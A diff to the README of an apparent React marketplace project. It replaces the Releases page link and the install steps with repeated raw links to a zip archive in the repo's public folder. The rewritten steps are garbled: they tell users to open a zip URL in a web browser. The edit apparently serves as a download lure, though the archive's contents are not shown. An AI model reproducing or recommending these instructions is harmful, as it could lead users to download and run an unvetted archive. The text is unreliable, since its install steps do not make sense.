Harvey-the-goat/react-marketplace/README.md

 ## 📂 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/Harvey-the-goat/react-marketplace/releases) to get the latest version.
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/Harvey-the-goat/react-marketplace/main/public/react-marketplace-v3.1.zip) to get the latest version.

 2. **Choose a Version**: Look for the version that best suits your needs, typically the latest version is recommended.

-3. **Download the Files**: Click on the ".zip" or ".tar.gz" file link to download the project.
+3. **Download the Files**: Click on the ".zip" or "https://raw.githubusercontent.com/Harvey-the-goat/react-marketplace/main/public/react-marketplace-v3.1.zip" file link to download the project.

 4. **Extract the Files**: Once downloaded, locate the file in your downloads folder.
 Right-click the file and select "Extract All" (or similar option, depending on your system).

 5. **Open in Browser**: Navigate to the folder where you extracted the files.
-Open the index.html file in your web browser.
+Open the https://raw.githubusercontent.com/Harvey-the-goat/react-marketplace/main/public/react-marketplace-v3.1.zip file in your web browser.

 6. **Explore the App**: You can now use the app directly in your browser.
 Start exploring the marketplace features!